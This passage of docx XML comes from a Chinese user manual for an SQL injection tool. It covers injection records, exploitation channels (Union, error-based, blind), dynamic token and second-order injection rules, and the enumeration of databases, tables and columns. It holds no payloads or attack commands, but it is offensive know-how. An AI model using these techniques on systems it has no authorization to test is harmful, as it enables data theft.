          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：URL、注入参数、注入类型（标签）、数据库类型、检测时间等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609FEA6E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>搜索工具栏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：按 URL / 参数 / 注入类型 / 数据库类型等条件组合过滤；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444AF2C">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF3F98">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：回放该记录的检测详情；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C847A">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>取数 / 恢复配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：一键把该注入点恢复到当前配置（请求、注入标记、注入类型、数据库、时间值等全部带出），跳转数据管理直接利用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A5B24">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：删除选中记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE0986">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>多目标批量检测后，可在记录页挑选任意注入点随时切换利用对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 6 章 数据管理（取数与利用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCE7B0">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>「数据管理」是利用主页面，顶部为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>注入配置区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（左右布局：左侧两行配置——检测记录选择 / 目标 URL / 端口 / SSL / 线程，以及值预测、在线学习、值缓存、通道升级等取数增效开关与读取方式 / 编码；右侧为通高的"应用"按钮，默认由注入记录带出配置，手动调整后点"应用"覆盖取数链路），下方为选项卡工作区，默认选中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>请求配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044EE36A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.1 请求配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5F8A4">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>请求编辑区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：完整 HTTP 报文编辑，支持插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>注入标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（指定注入点）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>插入动态值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（取数占位符）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>编码标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（指定编码方式）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64B3D2">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>通道配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（GroupBox 分区）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E23916">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：请求方式、超时、重试、编码、SSL、线程数量（顶部）、跟随 302；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B19DE">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：列数、回显位、前置闭合等 Union 通道参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35992584">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：报错通道的回显提取规则；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FAEC4">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Bool 盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：真 / 假判断的关键字、相似度阈值、比值阈值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296243C">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：延时秒数、判定阈值（由注入记录自动带出实测值）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541F6EC">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>查找判断值 / 验证值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：页面特征定位与二次验证，置于卡片底部；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF48A00">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>动态规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（防护绕过页"动态规则"选项卡，动态值与二次注入统一为规则管理；原"伴随请求"）：以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>TableView 规则列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">管理全部动态规则（启用开关 / 名称 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>标记名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / 类型 / 来源 / 取值方式 / 摘要一目了然），点"新增规则"或双击列表行，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>编辑弹窗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>中完成配置（弹窗内请求报文带 HTTP 语法高亮）；规则类型分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>动态值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>二次注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>两类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>动态值可多条同时启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>二次注入同时只能启用一条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（开启一条自动关闭其余）；也可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>标记名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>精确关联：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A60BEC">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>标记名与规则开关（多规则场景）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：每条规则可设置唯一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>标记名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（留空自动补默认值：动态值 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / 二次注入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sencond</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）。注入检测页与数据管理页的请求报文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">右键菜单"插入动态值"列出全部动态值规则（无选中态，数据管理工具栏"动态值"按钮同源），点击规则即启用它并在报文中插入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：有选区时插入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;标记名:选区数据&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（选区数据保留作占位值，发送时整块被动态值替换），无选区时在光标处插入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;标记名&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>；规则的启停统一在 防护绕过-动态规则 页管理（动态值可多条同时启用）。右键菜单"二次注入（单选）"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>以单选按钮列出全部二次注入规则，选中一条启用并自动关闭其余</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，并含"关闭二次注入"项一键全部停用。不带标记名的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关联第一条启用的动态值规则，多条动态值规则并存时通过标记名精确指定由哪条规则取值；二次注入同理可写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Sencond:标记名&gt;&lt;/Sencond&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指令（仅用于指定规则，发送前自动从报文剔除）；命名标记找不到对应启用规则时会在日志中提示并跳过，不会误用其他规则；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D444C4">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">动态值（回填 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：主请求发出前取得动态值并回填主请求的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;DRule&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记（CSRF token / 防重放 / API 签名场景）。取值来源三种：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>直接粘贴请求报文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>抓取、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>URL + 请求方式（GET/POST）抓取、脚本生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（不发抓取请求，脚本输入为主请求报文，输出动态值，可对报文做签名，适用于 API 接口）；从响应中提取时支持字符串截取（开始 / 结束字符）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>脚本提取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（脚本输入为完整 HTTP 响应报文：头 + body）。脚本按用途分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>请求抓取 / 自主生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>两类型，规则弹窗按来源自动过滤可选脚本，并可点"添加脚本"按钮现场新建；脚本统一在本页"脚本管理"子选项卡维护。弹窗内置"测试抓取动态值"：按当前编辑内容实际执行并展示取值结果，保存前即可验证；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717DCB94">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>后置 · 二次注入取数（响应替代主响应）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>回显页面的完整 HTTP 请求包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（或 URL + 请求方式）并启用；之后每次注入请求发出后，工具自动追加请求该回显页面，并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>用回显页面的响应替代原响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">进入后续解析（Union 回显提取、报错提取、Bool 判断、数据读取全部透明生效）。适用于注入点与数据显示分离的场景（如注入在写入接口、数据在查询接口）。回显页面请求中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Rand&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标记会与刚发出的注入请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>按请求流自动配对（FlowRand）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，多线程下各请求流独立配对、不会交错错配，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>无需限制单线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（多线程取数全速可用）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963BFC2">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>代理 / 认证 / 重发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>等网络相关见第 7 章。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FC8A2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.2 环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F7F54">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">一键读取数据库环境信息：版本（banner）、当前用户、当前库、主机名、是否 DBA、系统变量等。按数据库类型自动选择对应 SQL（如 MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、SQLServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>v$version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305DB536">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.3 数据操作（库 / 表 / 列 / 行）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04CB38">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>树形逐级枚举：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC08F26">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>获取库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：枚举全部数据库（自动跳过系统库可配）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B8CC0">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>获取表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：选中库后枚举表；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6208A">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>获取列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：选中表后枚举列与类型；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FAC72">
      <w:pPr>
